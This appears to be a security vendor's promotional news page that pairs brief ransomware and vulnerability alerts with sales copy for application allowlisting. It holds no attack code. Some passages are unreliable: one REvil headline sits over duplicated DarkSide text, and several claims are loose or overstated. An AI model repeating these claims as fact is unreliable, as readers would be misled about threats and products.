Money is Fueling the Cyber Pandemic

The cybersecurity industry has abandoned prevention in favor of reaction
because this strategy maximizes their revenue

Ransomware Incident News & Updates | Ransomware Prevention

Learn how to best protect your network from ransomware, Connect With Us.

Critical Alert: Chrome Zero-Day Active Attack - Update Your Chrome Browser ASAP

Google Chrome users should update their browser immediately to install Google's latest security fixes. Hackers are currently exploiting a high-severity, zero-day vulnerability, and Chrome users need to act quickly. To update Chrome, go to the Chrome Menu, click on Help, then on About Google Chrome; (Chrome menu > Help > About Google Chrome). There you can see if Chrome needs updating.

Critical Alert: Popular Logging Utility CVE-2021-44228 Dubbed Log4Shell Exploit Allows Complete Access

Both private companies and government agencies are scrambling to protect their systems and networks from the popular logging utility CVE-2021-44228 exploit that allows a threat actor to gain complete access to the target system. The critical vulnerability in the Apache Server Log4j logging utility allows hackers to exploit the affected application by logging a specially designed string.

Cybercriminals are weaponizing unpatched Apache servers affected by the Log4Shell vulnerability to install Cobalt Strike penetration tools, cryptocurrency miners, and to recruit the devices into a botnet to compromise other systems and networks. Exploits such as these demonstrate how valuable Application Allowlisting security software is in protecting networks, preventing ransomware attacks, and securing critical data. Explore the best endpoint security protection software to prevent ransomware.

Ransomware Cybersecurity

Critical Alert Update: New Apache Log4j Update Released to Patch Vulnerabilities

CVE-2021-44832 Log4j Patch Update. The Apache Software Foundation (ASF) has been rolling out fresh security patches to fix 4 out of the 5 vulnerabilities in Log4j that can be used by hackers to run malicious code on affected networks. The latest vulnerability CVE-2021-44832 requiring a patch has a rating of 6.6 severity on a scale of 10. The latest patch release does not resolve the fifth known flaw affecting the logging library tool version Log4j 1.2.

In addition, the FTC is notifying companies to actively protect consumer data from Log4j cyber-attacks or to possibly risk legal action from the FTC. Implementing Application Allowlisting Security is one of the best ways to protect critical and sensitive data. Learn more about our comprehensive Cybersecurity Solutions. CISA is issuing the following guidance regarding the Log4j Vulnerability.

Critical Security Alert: Cyber-Attacks Reach Almost 1,000 Per Week, an All-Time High

Cyber-attacks on organizations are up 50 percent year-over-year, specifically due to the Log4j vulnerabilities. We are experiencing a Cyber Pandemic and a Ransomware Crisis. Fight ransomware with Application Allowlisting. Whitelisting software solutions help prevent malicious code from running on your network and effectively blocks ransomware. Connect With Us to learn more.

Cloud Security Compromise and Remote Access Trojan Exploits. Hackers are increasingly using a target's own cloud services infrastructure from Microsoft (Azure Cloud) and Amazon (AWS) to launch malicious ransomware campaigns, and to install Remote Access Trojans (RATs) onto target systems. Cyber-attackers using email phishing are delivering variants of the malware known as AsyncRAT, Nanocore, and Netwire. Application Allowlisting Security prevents malicious code from executing protecting systems on premises, in the cloud, and in hybrid environments.
Connect With Us for more info.

Windows Microsoft Defender Antivirus Vulnerability. Hackers can use Microsoft Defender Antivirus to deliver malware due to a weakness that affects the Windows Defender Antivirus. They do this by probing locations the Defender Antivirus excludes from scanning and subsequently planting malicious payloads there. As this demonstrates, Blacklist Antivirus products such as Windows Defender are not enough to stop ransomware. Only Whitelisting Antivirus products can prevent ransomware from running on a device or network.

Critical Microsoft Alert: Ice Phishing Warning on the Web3 Blockchain

Microsoft warns of increasing use of Ice Phishing, a technique used to steal cryptocurrency credentials and token swap authorizations. Cybercriminals trick victims into unwittingly signing an authorization for a blockchain token Smart Contract transfer, thereby delegating approval of the token transfer to the cyber-attacker. Despite blockchain Smart Contracts (DeFi) being immutable, and (DEX) Decentralized Exchange private key hardware wallet security, the fraudulent authorization allows cybercriminals to abscond the funds. Ice Phishing techniques such as those used in the Badger DAO attack that stole millions in digital currency, target the fraudulent token transfer authorization vs directly stealing the cryptocurrency owner's private keys. Common ERC-20 Smart Contract DeFi transactions entail authorizing a Uniswap DEX to exchange USDC tokens for LINK tokens, or vice versa, using the owner's digital signature and router address. In an Ice Phishing attack, the attacker changes the legitimate spender's router address to attacker's router address. This fraud is effective because the user interface doesn't provide for router verification or signs of router address modification. To help combat ERC-20 Smart Contract fraud, Microsoft is implementing Forta, a real-time smart contract fraud alert system to analyze and make notification of suspicious digital currency transactions.

Critical Windows Alert Update: CISA issues Feb 18, 2022 Deadline to Federal Agencies to patch Windows 10 Privilege Escalation Bug

The Windows 10 exploit CVE-2022-21882 affects all un-patched versions of Windows 10. This dangerous vulnerability with a severity score of 7.0 requires absolutely no user interaction in order to exploit. The Local Privilege Escalation (LPE) vulnerability affects Win32k.sys driver which hackers can use to quickly elevate user and admin privileges allowing lateral movement within the network. Ransomware groups are continuing to exploit advanced persistent threat compromises to attack already vulnerable networks.

Critical Malware Alert: TrickBot Targeting Financial, Technology and Cryptocurrency Firms

The TrickBot malware is targeting customers of financial, technology, professional services, and cryptocurrency firms. TrickBot ransomware attacks are particularly dangerous because the malware developers use a form of meta-programming also known as a "Bazaar of Tricks", that allows TrickBot's malicious code to avoid detection, reverse engineering, and removal. Furthermore, the ransomware typically targets attacks high-level victims with administrative privileges in order to steal their credentials and subsequently move laterally across a network to steal confidential financial and other sensitive data. The Bazaar Family of Ransomware is especially adept at evading traditional blacklisting security software using fileless backdoor infections to establish stealth and persistence on a system. For this reason, Application Allowlisting security solutions which only allow programs and files specifically on the system's whitelist to run are highly effective against these types of advanced persistent threats.

Critical Android Security Alert: Android Users Tricked Into Downloading Malware

On Google PlayStore, a relatively safe app download site, millions of Android Users have been inadvertently installing Dark Herring Scamware. Over 450 malicious Android applications are using deception to distribute the malware through Google Play and other third-party app download websites. Google has removed all the malicious apps from the store but users who have them installed on their devices are still at risk. Users should be using Application Allowlisting Antivirus solutions for Android to prevent malicious code from running on their mobile devices. Dark Herring is a cash-stealing malware that adds sneaky charges onto cell-phone carrier bills.

Android Trojans Medusa and Flubot possess Spyware and RAT abilities to steal banking funds from unsuspecting malware victims. Theses stealthy, mobile Remote Access Trojans (RATs) allow the cyber-attacker to remotely gain access and control of an infected device. A favorite avenue for delivery is through Smishing - malicious SMS text messages. Once the Trojan is running on a device, the hacker sends commands to it in order to gather private banking data, steal passwords and login credentials. Medusa and Flubot are evolving their capabilities and are a serious cyber-threat to mobile banking apps. Once these RATs gain permissions, their command-and-control server can remotely click on a specific user interface elements, take screenshots, lock the device, get a list of device apps, open notifications and steal banking account info.

Critical Apple macOS Security Alert: ElectroRAT, Silver Sparrow, XLoader, XcodeSpy, XCSSET, and MacMa Threaten Mac Users

While there are some security advantages to using Apple macOS and iOS devices, that advantage is disappearing as hackers increase their attacks on Macs and iPhones. Threat actors are using zero-day exploits to deliver Mac specific malware to their targets. PC Matic for Mac is the best anti-malware for macOS to prevent threat actors from running malicious code on a Mac. New threats such as ZuRu and OSX.CDDS can gain remote access to Mac devices. XLoader is capable of logging keystrokes, making screen shots, stealing log-in credentials, downloading malware, and ransomware. Explore the best antivirus for Mac OS.

Critical Security Alert: Insecure WordPress Plugin Leaves 20 Thousand Sites Vulnerable

The The WordPress WP HTML Plugin is open to Cross Site Scripting (XSS) software attack which can inject malicious scripts into otherwise trusted emails or websites. The security exploit puts twenty thousand WordPress sites at risk allowing hackers to inject code and deliver phishing emails with malicious viral payloads. XSS vulnerabilities can be dangerous because they allow cybercriminals to bypass access controls and gain elevated access-privileges.

Critical Security Alert: McAfee Vulnerability Can Allow Hackers to Gain Elevated Windows SYSTEM Privileges

McAfee Antivirus has two high-severity vulnerabilities in its security software components that can allow cyber-attackers to execute code with elevated SYSTEM privileges. With such system privileges, a bad actor could execute an arbitrary code attack (ACE) and take full control of the system. McAfee has issued a security patch and users should update their McAfee products immediately.

Critical Browser Alert: Chrome to Prohibit Direct Access From Private Network Endpoints

As part of a major security update and to prevent cyber-intrusions via the browser Google's Chrome will soon prohibit endpoints in a private network from accessing public-facing websites.

CyberSecurity Tip: Use Zero-Trust Whitelisting Security to Fight Phishing Vulnerabilities

With WFH (Work-From-Home) becoming a mainstay of the distributed workforce, cybersecurity IT personnel are finding it a challenge to properly authenticate and monitor every single connected device including mobile phones, tablets, and IoT (Internet of Things) devices. In fact, malware infections on IoT devices rose by 35% year over year. Hackers now have a greater attack surface than ever before upon which to launch their phishing attacks and (SMS) smishing attacks.

Cybercriminals are increasingly concentrating their efforts on employees' vulnerable mobile devices with much success. Using social engineering techniques combined with compromised business communications data from company email lists and address books, hackers are better able to craft convincingly realistic business communications. These highly effective email phishing attacks give bad actors a foothold from which to launch ransomware attacks on a company's network. Furthermore, devices that in the past were relatively secure from virus attack such as Chromebook (Chrome OS) and Apple's macOS and iOS, are entirely vulnerable to phishing, malware infection and browser-based exploits.

To prevent ransomware from running on any device, combine robust email-security with Zero Trust Whitelisting Solutions and Secure Remote Desktop Access Control. Since only approved, safe applications on the app whitelist can execute, IT administrators can better protect their networks from ransomware attack via phishing.

Ransomware Security Alert: Cyber-Gangs using Prometheus to Distribute Malware and Remote Access Trojans

Hacker gangs are using Prometheus, an event monitoring and alerting tool in a crimeware-as-a-service (CaaS) solution and Cobalt Strike a ransomware tool for malicious cyber activities. Cybercriminals use the technique to distribute Qbot, IcedID, Campo Loader, Hancitor, and SocGholish drive-by and social engineering attacks to infect endpoints with ransomware and Remote Access Trojans (RATs).

Ransomware News Alert: The International Red Cross Suffers a Major Ransomware Attack

A major cyber-attack on The International Red Cross organizations suffered a malicious ransom attack where over 500,000 people's sensitive private data is now in the hands of hackers. The Red Cross wishes to speak directly and confidentially to the cyberciminals in an appeal to their humanity to not release confidential data that could put peoples lives in jeopardy. The Red Cross works tirelessly to assist people worldwide including those in particularly vulnerable and dangerous circumstances. Unlike financial data held for ransom, the Red Cross data breach could have much broader security implications.

Security News Alert: Enormous Denial of Service Attacks Launch Against Microsoft

Record-Breaking DDoS (Denial of Service) Attacks which exceed 3 Tbps are being launched consecutively against Microsoft. The software icon has been able to mitigate the attacks but the breadth and frequency of the DDoS assaults is alarming.

Security News Alert: US and Russia Crack Down on the REvil Hacking Group

The US request for the Russian Government to crack down on the REvil group ransomware attackers is bearing fruit as Russian officials raid members of the ransom group. The Russian Security Service, the FSB, reports that fourteen cybercriminals have been caught and charged with illegal means of payment. The FSB also states that it has neutralized the cyber group's infrastructure.

Hackers hit Ukraine with a massive cyber-attack on Ukrainian government websites. As a result of the cyber-assault, Ukraine's ministry of foreign affairs and other government agency websites are off-line. The hackers are using a new strain of destructive malware known as Whispergate, a Master Boot Record (MBR) wiper. Master Boot Record wipers run when a machine is powered off and then bricks the target system rendering it unusable.

FBI Cybersecurity Alerts

Critical FBI Security Flash Alert: RagnarLocker Ransomware Threat to Critical Infrastructure

The FBI is releasing a Ransomware Flash Report detailing indicators of compromise associated with the ransomware group RagnarLocker. The group is instrumental in carrying out attacks on critical infrastructure sectors including enterprise, government, supply chain, power, and energy sectors. Ransomware IOC Flash Report. Cyber-attackers search for vulnerable networks upon which to deploy the Ragnar Locker ransomware. Once they gain a foothold, they inject malicious software onto the target’s system or server in order to steal critical and sensitive data.

Critical FBI Security Alert: Critical Infrastructure Ransomware Attack Warning

The FBI is warning that Critical Infrastructure ransomware attacks are targeting US entities. This critical cyber-threat alert is regarding BlackByte Ransomware Attacks targeting multiple critical infrastructure sectors in the United States. BlackByte is a Ransomware-as-a-Service (RaaS) group attacking US government, financial, food, and agricultural sectors. BlackByte can hide within an image file such as a .png or use Microsoft Exchange Server vulnerabilities to gain access and make lateral movement across a network. Organizations and businesses need to keep their operating systems patched and up to date, use multi-factor authentication, remain vigilant against phishing and smishing emails, implement a zero-trust application allowlisting solution, and secure remote desktop access controls.

Critical FBI Security Alert: FBI Warns of Possible Winter Olympics 2022 Cyber-Attacks

The FBI warns that cybercriminals could launch Denial of Service Attacks (DDoS), ransomware attacks, email phishing attacks, spyware, and other types of malware attack on Winter Olympic broadcasters, vendors, sponsors, visitors and participants the Winter Olympics. They could use cyber-intrusions, ransomware, and DDoS attacks to interrupt live broadcasting events, breach vendor networks, hotels, food services, energy or transportation services. In addition both private and public sponsors are at risk for targeted malware attacks to compromise sensitive data. Laptops, tablets and mobile cell devices are especially prone to malicious code downloads and for this reason the U.S. Olympic Committee is advising participants and visitors to use burner phones and to lease computers for the event. There should be no expectation of security or privacy.

At a minimum, it said Windows and macOS-powered machines landing in China should be cleansed of personal and business data and hardened via appropriate security software and protocols at the BIOS, authentication, and application level.
Critical FBI Security Alert: Ransomware Group FIN7 is Mailing Maliciously Infected USB Sticks to Install Ransomware

The FBI is warning that FIN7 ransomware attackers are disguising themselves as US Government Health & Human Services officials or representing Amazon to mail ransomware virus-infected USB devices to targets in the insurance, transportation, and defense industries.

Critical Security Alert: Symantec's Norton360 and Avira Place a Cryptominer in their Antivirus Software

The Norton Crypto and Avira Crypto software mines Ethereum (ETH) cryptocurrency using customers' machines. Norton started offering mining services in 2021 and the mining software is now running by default on the Norton 360 and Avira antivirus products. This, under the guise of creating a digital cryptocurrency wallet for the customer. Many long-time Norton customers are shocked at the prospect of having their antivirus security product installing crypto-coin-mining software by default. Instead, a good computer security product should be detecting and blocking crypto-miner hijackers. This is just another example of why whitelist technology is needed to fend off bad actors. Whitelisting software blocks any attempt to run unauthorized programs such as cryptominers in the background.

Ransomware Alert: Media Giant Impresa Hit by Ransomware Attack

Impresa is one of the largest media companies in Portugal with the biggest television station, online newspaper, and other digital media properties. The ransomware gang Lapsus$ appears to have accessed the media company's critical server infrastructure impacting Impresa's operations including video streaming. The cyber-gang gained unauthorized access through the company's (AWS) Amazon Web Services account. This ransomware incident highlights the importance of server cyber security and ransomware protection.

Cyber Alert: Broward Health Hospital System Data Breach

The Broward Health Hospital System suffers a data breach where hackers gain unauthorized access to hospital staff and patient sensitive data. The cybercriminals were able to obtain protected personal and medical information of both staff workers and patients normally protected under HIPAA. HIPAA sets national standards to protect sensitive patient health information including EHR (Electronic Health Records) from being disclosed without a patient's knowledge or explicit consent. In this data breach, hackers were able to access sensitive personal data such as name, social security number, birthday, address, driver's license, banking information, complete patient histories, diagnoses, and medical treatment records. The data breach exposed over 1.3 million patient records. This data breach demonstrates the need for network security best practices for cyber-protection such as Application Allowlisting Best Practices which would have helped prevent malicious activity through the third-part medical provider that was allowed to access Broward Health's systems.

Cyber Alert: LogMein's LastPass Password Manager Vulnerability

LastPass claims that none of its 30 million users and 85,000 business customers have been victims of credential stuffing password attacks despite email alert notifications from LastPass to customers. LastPass states those email alerts were sent in error. The message led some to believe email clients were targets of hackers who use email addresses and passwords stolen through third-party cyber-breaches. Cyber incidents such as these demonstrate how important email security is. Create strong passwords that are at least 13 characters long, never re-use passwords for any other websites, social media or apps, and always enable multi-factor authentication on all your accounts. Learn more about Cyber Safety from PC Matic Security Professionals.

Vulnerability Alert: Microsoft Azure Web App Zero-Day Exploit

Microsoft Azure App Service has a vulnerability that exposes source code of web applications in Python, Ruby, PHP or Node.JS published using Local Git. Threat actors who gain access to the source code can steal credentials, security and access tokens, gain unauthorized access to sensitive data, and probe a network's infrastructure to find vulnerabilities to launch an advanced persistent threat ransomware attack. While Microsoft offers a fix through the web.config file for IIS servers, it leaves other web servers that make access through Linux (LAMP Stack) such as Apache, Nginx and other open-source configurations that use programming languages such as Python, Ruby, Node.JS, Perl and PHP vulnerable to cyber-attack. More than ever, IT security tools such as Application Allowlisting that prevent Zero-Day malicious code from executing on systems should be part of every security stack.

Hackers are utilizing Microsoft device registration to attack business enterprises with lateral email phishing schemes. Microsoft is releasing details of a significant, advanced persistent targeted threat using email phishing campaigns that uses stolen Microsoft credentials to register devices on a cyber-attack victim's network to further disseminate malicious emails and widen the cyber-infection pool.

Critical Alert: All in One SEO Exploit - WordPress Plugins Continue to be a Major Vulnerability

The All in One SEO WordPress Plugin has a critical security vulnerability that can allow privilege-escalation leading to backdoor admin access. The exploit allows a regular subscriber to escalate privileges to unauthorized administrator privileges on the account. With admin privileges hackers have access to the API endpoint enabling them to send malicious SQL commands (SQL Injection) to the database, steal credentials, and other data. All in One SEO plugin users should immediately upgrade to the patched version.

In addition, almost 100 other WordPress plugins and themes have a backdoor vulnerability hackers are using in supply chain cyber-attacks. WordPress plugins were most recently subject to stealth credit-card skimmer attacks whereby hackers inject malicious code into a plugin to avoid using the wp-admin and wp-includes directories in order to prevent detection.

Ransomware Alert: Ransomware Strikes Ultimate Kronos Group HR Management

UKG is one of the largest Human Resources Software Management firms offering employee and payroll services. A ransomware attack is impacting companies whose employees use Kronos software to manage payroll, electronically clock in and out, track expenses, and benefits including vacation, sick days, and (PTO) paid time off. Kronos is currently investigating to determine if there is any relationship between the Log4Shell Log4j vulnerability exploit and the ransomware attack.

CISA (Cybersecurity and Infrastructure Security Agency) has compiled a list of Known Exploited Vulnerabilities which serves as an essential security patch warning system - CISA List of Known Vulnerabilities.

In 2022, (CISA) adds 17 actively exploited vulnerabilities to the Known Exploited Vulnerabilities List. The vulnerabilities and malicious exploits on the list are the type of cyber-threats that can allow bad actors to launch cyber-attacks including (APTs) advanced persistent threat ransomware attacks, steal credentials, gain unauthorized access to devices and networks, (RECs) remotely execute commands, (AECs) arbitrarily execute commands, download and execute malware, and steal critical or confidential data.

FBI & CISA Cyber Alert for the Holidays

The FBI and CISA are issuing a holiday cyber-threat warning regarding hackers and prospective holiday cyber-attacks. US officials are urging increased vigilance on the part of organizations and their IT security teams over the holidays. The cybersecurity advisory alerts security professionals to the heightened risks over the holiday season to include Thanksgiving, Christmas and New Year's for critical infrastructure, business network, and other high-visibility ransomware attacks. The advisory also encourages preventive security actions such as updating systems and applications, applying security software patches, implementing MFA (Multi-Factor Authentication), and reviewing current cyber-incident and business continuity plans.

Emotet Resurgence Launches Ransomware Attacks

Emotet Botnet, by the Malware-as-a-Service hacker group Mealybug, began a resurgence last month. Emotet is one of the most prevalent Trojans that is maliciously spread through email spam, phishing attacks, and MS Office Documents. Emotet usually piggybacks on TrickBot or QakBot malware to eventually launch ransomware strikes. In its latest evolution, Emotet malware is directly installing Cobalt Strike on infected systems giving cyber-criminals immediate unauthorized access to ransomware targets' systems.

Cobalt Strike is a remote access penetration tool normally used by cybersecurity professionals to simulate cyber-attacks, and Emotet is exploiting the tool to gain immediate unauthorized access. In addition, the newest variant of the Emotet Trojan can hide from typical antivirus software by embedding malicious macros inside Microsoft Office documents. Ransomware protection software using application allowlisting is one of the best ways to prevent malicious scripts and hidden infected macros from running on a device. PC Matic Pro Security Software has a Microsoft Office Macro Whitelist that protects systems by blocking malware from running infected macros on your device.

Ransomware Cybersecurity

Panasonic Data Breach Creates Uncertainty

The breach of Panasonic's file server is creating uncertainty about what server data was compromised by cyber-criminals. Some reports indicate that hackers gained unauthorized access to Panasonic's system back in June giving the attackers four months or more to further penetrate the company's IT systems. The servers store sensitive technology and employee data which can mean massive amounts of critical data may have been exposed. This is not the first ransomware incident to affect Panasonic and demonstrates the importance of installing effective enterprise cyber-security and ransomware prevention solutions.

FBI's Email System Hacked

A breach of the FBI's email system results in phony FBI cybersecurity alerts being sent to thousands of unsuspecting recipients. The Federal Bureau of Investigation confirms that on Saturday still unidentified hackers breached one of its email servers blasting out fake alert messages.

GoDaddy Security Breach Exposes Over 1 Million Accounts

A GoDaddy network breach exposes 1.2 million managed WordPress customer accounts hosted at GoDaddy. The data hack exposed sensitive customer data to the cybercriminals for a period of almost 3 months. The hackers gained unauthorized access using a compromised password. GoDaddy recently detected suspicious activity on their network and started investigating the security breach with the assistance of an IT forensics company. This cyber incident highlights the importance of password hygiene and email security to guard against phishing attacks using stolen customer data.

US Government Offers $10 Million Reward for Info Leading to DarkSide Ransomware Gang

The US Government Dept. of State is offering a $10 Million bounty for information that could lead them to leaders of the DarkSide Ransomware Gang. DarkSide was responsible for the Colonial Pipeline ransomware attack back in May 2021 that shut down the oil pipeline the energy company manages. Colonial Pipeline paid a $4.4 Million ransom in Bitcoin of which $2.3 Million was recovered by the FBI's Digital Extortion Task Force. The Federal Government is becoming more adept at disrupting the ransomware supply chain, and more successful in its fight against cybercriminals who use cryptocurrencies in their ransom extortion schemes.

As part of the fight against ransomware gangs and malicious cyber threats, NIST recommends the use of Application Allowlisting software as part of every organization's security stack. PC Matic is currently working with NIST's NCCoE to help design and implement the best strategies for zero-trust architectures (ZTA).

The US Government Arrests Hacker Involved in Kaseya Ransomware Attack

In a global law enforcement action known as GoldDust, the US has arrested affiliate members of the REvil Ransomware Gang aka (Sodinokibi) Ransomware-as-a-Service group with the assistance of Europol's Joint Cybercrime Action Taskforce (J-CAT), Polish, and Romanian authorities. Two Romanians, a Ukrainian national, and several others have been charged with deploying ransomware that affected over 1,500 MSP and enterprise downstream clients of Kaseya, the Florida-based software company that was hacked back in July 2021. In total, the operation has resulted in the arrest of seven members of the Ransomware Evil and GandCrab groups who collectively have been responsible for well over 7,000 ransomware attacks against consumers, businesses, industry, and governments worldwide. GandCrab Ransomware-as-a-Service is considered the original incarnation of REvil. The group was responsible for encryption and extortion attacks which primarily targeted consumers and businesses running Windows PC's.

Ransomware Cybersecurity

Hacker Arrest Update: Officials arrest a third ransomware affiliate in Romania. In a separate cyber-police action officials arrest 51 data brokers in Ukraine who were attempting to sell the data of over 300 million individuals.

The US Government Seizes $6 Million from the REvil Gang

The US arrests affiliate members of the REvil Ransomware Gang. DarkSide was responsible for the Colonial Pipeline ransomware attack back in May 2021 that shut down the oil pipline the energy company manages. Colonial Pipeline paid a $4.4 Million ransom in Bitcoin of which $2.3 Million was recovered by the FBI's Digital Extortion Task Force. The Federal Government is becoming more adept at disrupting the ransomware supply chain, and more successful in its fight against cybercriminals who use cryptocurrencies in their ransom extortion schemes.

As part of the fight against ransomware gangs and malicious cyber threats, NIST recommends the use of Application Allowlisting software as part of every organization's security stack. PC Matic is currently working with NIST's NCCoE to help design and implement the best strategies for zero-trust architectures (ZTA).

Ransomware Cybersecurity

Ransomware Breaches Robinhood Trading App Platform

Robinhood Security Data Breach. Over seven million Robinhood trading app customers are at risk after a ransomware attack on the online investment platform. The hacker is extorting the fin-tech company after socially engineering a ransomware breach to gain access to email addresses and other customer sensitive personal data. Data leaked by the cybercriminal include name, date of birth, email address, and zip code. Robinhood clients have been advised that no links to access their accounts will be sent in future Robinhood emails to help prevent phishing attacks. Clients are also asked to change their passwords and to set up multifactor authentication as a preventative measure.

FBI Warning Against Ryuk Ransomware Attack for Healthcare Providers

Ryuck and Trickbot Ransom Attack Warning. The FBI and CISA (Cybersecurity and Infrastructure Security Agency) have issued a ransomware warning for hospitals and other healthcare providers. TrickBot malware leading to ransomware attacks using the Ryuk ransomware. Trickbot and BazarLoader are malware variants that are instrumental in advanced persistant threats or APT's cybercriminals use to prepare targeted ransomware and extortion attacks. Hospital application allowlisting software can help prevent ransomware by protecting healthcare IT systems and networks from malware breaches.

Cloud Security: Kubernetes Attack Matrix

Microsoft introduces Kubernetes Attack Matrix for improving cloud container infrastructure threat protection. Cloud-native containerized environments are increasingly at risk for ransomware attack. Microsoft is offering its own Mitre-style ATT&CK framework for Kubernetes Cloud and Cluster Security to help IT staff and administrators better identify vulnerabilities in their defense of containerized applications and cloud-native environments. The Cloud Security framework maps the Kubernetes threat landscape and supports Microsoft's Cloud Security to provide continuous discovery, analysis and protection recommendations against different security threats that target Kubernetes and Docker environments.

Microsoft Defender for Cloud & Kubernetes are enhanced cloud security products that protect Azure Kubernetes containerized applications, On-Premises and Multi-Cloud Arc-enabled Kubernetes. These offerings provide real-time threat protection for Kubernetes nodes and clusters. Host-level threat protection is provided by Microsoft Defender for Servers. Application Allowlisting solutions work seamlessly with Microsoft cloud security to effectively protect against ransomware in cloud, on premises, and hybrid environments.

Ransomware Cybersecurity

Ransomware Attack on the NRA

The ransomware group Grief, an affiliate of REvil has allegedly stolen sensitive data from the NRA making it available on the dark web.

New Threat Actor SnapMC Steals Files in "Quick Strikes"

Rapid strike data exfiltration and cyber-extortion is the modus-operandi of the new group SnapMC. The group uses a vulnerability scanner to expose flaws in the cyber-attack target's VPN or web server apps. By exploiting unpatched VPNs and webserver applications, SnapMC rapidly breaches the network, steals valuable files, and sends extortion emails all within 30 minutes. Cybersecurity experts agree that keeping applications and operating system software updated is a crucial step in avoiding these kind of ransomware cyber-attacks. Learn more about server security and automated security patch update management.

Ransomware Cybersecurity

WordPress Plugin Vulnerability Exploits

WP plugin vulnerabilities in the OptinMonster email marketing tool for WordPress created a security hole that left millions of websites exposed to exploitation by hackers through the REST-API endpoint used for integration. A patched version of the plugin has since been released.

Ransomware Cybersecurity

IT Supply Chain Ransomware Attacks

Microsoft warns that Nobelium, the hackers behind the SolarWinds breach is planning a new wave of attacks to compromise customers of cloud service providers (CSPs), managed service providers (MSPs), and other IT service providers.

Ransomware Cybersecurity

Conti Ransomware Attacks

An alert has been issued by the FBI and CISA (Cybersecurity and Infrastructure Security Agency) regarding Conti ransomware. "In typical Conti ransomware attacks, malicious cyber actors steal files, encrypt servers and workstations, and demand a ransom payment." Conti bad threat actors gain access to a network through spearphishing, smishing and vishing campaigns. They use malicious email attachments and links, fake phone calls, software promotions, stolen Remote Desktop Protocol (RDP) credentials, and other system vulnerabilities.

Ransomware Cybersecurity

FamousSparrow APT Hacker Group

FamousSparrow, classified as an advanced persistent threat (APT) group, is a new hacking gang that targets government agencies, engineering companies, legal firms, and other organizations.

BlackMatter Agricultural Ransomware Attack

BlackMatter ransomware gang's attack on an Iowa grain and feed cooperative could lead to food shortages. The ransomware group is demanding $5.9 million from the agricultural cooperative which will go to $11.8 million if not paid within 5 days.

Phishing-as-a-Service Group

Microsoft has discovered what can be classified as a Phishing-as-a-Service (PHaaS) group, dubbed - BulletProofLink, BulletProftLink, and Anthrax. The group offers phishing email services including hosting and email management to cyber-gangs.

Application Allowlisting by PC Matic Available in Australia

As ransomware attacks surge globally, Australians are choosing PC Matic's application allowlisting to proactively stop ransomware. PC Matic announced technical and sales support for its business product line, PC Matic Pro and PC Matic MSP, during Australian business hours. "Our mission is to protect the world from ransomware, and Australians understand that application allowlisting is a critical element in any security stack to proactively stop ransomware," said Rob Cheng, CEO and Founder of PC Matic. Explore the difference between application allowlisting and application control

Ransomware Cybersecurity

CISA Releases Remote Access Guidance to Federal Agencies

CISA has released Trusted Internet Connections 3.0 Remote User Use Case guidance for goverment agencies. The Remote User Use Case provides federal agency users with guidance on how to apply network and multi-boundary security for agencies that allow remote users on their networks. Recent guidance also includes cybersecurity awareness with regards to ransomware attacks, network defense practices and best practices to prevent cyber-threats. Federal Agency Ransomware Protection.

The President Signs K-12 Cybersecurity Act Into Law

Last week, the President signed the bipartisan K-12 Cybersecurity Act of 2021 into law to provide school districts with IT security resources to combat threats and protect themselves against cyberattacks including ransomware.

Ransomware Cybersecurity

Ransomware in the Media

Media Attention

"Each year increased money and attention are devoted to cybersecurity, but ransomware continues to accelerate in the wrong direction. Despite national media coverage, ransomware attacks very rarely ever result in coverage that reveals the failed solutions that led to the infections. Why is that?"

Learn More
Ransomware Prevention and Cybersecurity


"Lost in the entire conversation is cyber prevention. Why is that? By focusing strictly on reaction, rather than prevention, the cybersecurity industry maximizes revenue at the expense of their customers. Prevention is practical, economical, and normally not newsworthy. With reaction, however, there is money to be made for the cybersecurity experts who clean up after a ransomware attack, so for many in the industry an incentive exists to allow them to continue."

Read Why Hackers are Winning

Ransomware Warnings

"As the developer of the first global whitelist, Rob Cheng is an American pioneer in cybersecurity. Our federal, state, and local governments would be in much better shape today, from a cyber defense perspective, if we had listened to him early on."

Van Hipp
Chairman of American Defense International, Inc.
Former Deputy Assistant Secretary of the United States Army

"Ransomware is now daily news and its victims are large technically sophisticated organizations, and critical elements of the cybersecurity industry. What is happening?"

Scott Augenbaum
30 year Cyber FBI Veteran, Author of "The Secret to Cybersecurity"
Cybercrime Keynote Speaker on the "Lack of Prevention in Cybersecurity"
Retired FBI Supervisory Special Agent, Cyber Division

Ransomware is Out of Control

Ransomware is getting past some of the most well-known antivirus software products and doing its dirty work for hackers and cybercriminals including some nation states. Which antivirus products or security products are failing to stop these cyber-attacks? A lack of transparency in the industry almost ensures that this vital information is not made public. Consequently, security holes and vulnerabilities are left unresolved resulting in more ransomware attacks. Other unsuspecting ransom victims are then hit, further fueling the security industry's expensive cycle of recovery efforts, and profits for the ransomware industry.

"The ransomware industry has blossomed into a high growth, high margin business extracting millions of dollars daily from its victims under the cloak of anonymity that have left law enforcement helpless. There is little barrier to entry to making ransomware. Rather than focusing on perpetrators, more attention should focus on the security holes through which the ransomware enters."

Finally, there is a ransomware solution - Read How to Stop Ransomware

Cyber-Prevention is the Missing Piece

"For every ransomware infection, there is a failed antivirus that allowed the ransomware on the network. Why is the public not informed which products are failing, and why they fail? Without ransomware prevention tools in place antivirus software alone is not enough to block threats."

Discover the 3 Pillars of Prevention

  1. Cybersecurity Training
  2. Multifactor Authentication
  3. Application Allowlisting
Explore the best ways to implement the 3 pillars of ransomware prevention.

Application Allowlisting Tools vs Blacklisting Antivirus Software

Unlike blacklisting antivirus software products, Application Allowlisting solutions only allow known, good programs to run on your computer, mobile device, server or network. With whitelisting, any unknown or untested new programs can't run, preventing malicious ransomware from running. This effectively blocks hacker's attempts to encrypt your files or lock your system.

PC Matic is the leading producer of automated Application Allowlisting solutions and security software in the USA. Our security solutions protect enterprise and small business, industry, schools, hospitals, local and federal government IT systems and networks.

Read more about Application Allowlisting Cybersecurity

Ransomware Decryption vs Ransomware Prevention

Using Ransomware Decryption Tools vs Ransomware Prevention Tools. Many victims of a ransomware malware attack are searching for recovery and decryption tools when it would be much less stressful and less expensive to simply use a ransomware prevention tool like application allowlisting. Use of whitelist technology for access and application control is part of the NIST recommended cybersecurity protocols.

With whitelisting tools, IT administrators could prevent a server or network data breach to begin with and avoid the remediation and recovery process.

Modern whitelisting technology is cloud-based and very easy to maintain. Visit ransomware protection software for the best anti-ransomware on the market, and explore how application allowlisting solutions work to protect you, your data and your business.